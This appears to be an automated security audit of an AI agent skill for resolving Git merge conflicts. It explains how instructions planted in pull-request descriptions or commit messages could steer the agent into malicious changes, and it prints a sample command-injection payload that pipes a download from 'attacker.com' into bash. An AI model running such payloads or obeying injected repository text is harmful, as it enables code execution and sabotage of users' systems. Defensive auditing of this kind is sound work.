roo-conflict-resolution
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION] (HIGH): Indirect Prompt Injection vulnerability through untrusted external content.
- Ingestion points: The skill retrieves the
titleandbodyof a Pull Request usinggh pr view(SKILL.md: Step 2) and analyzes commit messages and git history (SKILL.md: Phase 1). - Boundary markers: There are no delimiters or explicit instructions to ignore embedded commands within the fetched PR data.
- Capability inventory: The skill has extensive capabilities, including executing shell commands (
git,gh) and modifying the local file system. - Sanitization: No sanitization or filtering is applied to the PR metadata or commit history before the agent uses it to 'determine the best resolution strategy' (SKILL.md: Phase 2).
- Risk: An attacker could craft a PR description or commit message containing instructions that trick the agent into performing malicious code changes, such as introducing backdoors or deleting sensitive files.
- [COMMAND_EXECUTION] (HIGH): Risk of Command Injection via shell command interpolation.
- Evidence: The variable
[PR_NUMBER]is directly interpolated into multiple shell commands:gh pr view [PR_NUMBER]andgh pr checkout [PR_NUMBER] --force(SKILL.md: Steps 2-3). - Risk: While the skill mentions validation, a failure to strictly enforce numeric-only input allows an attacker to provide a malicious payload (e.g.,
123; curl http://attacker.com/malware | bash) that would be executed by the host shell.
Recommendations
- AI detected serious security threats
Audit Metadata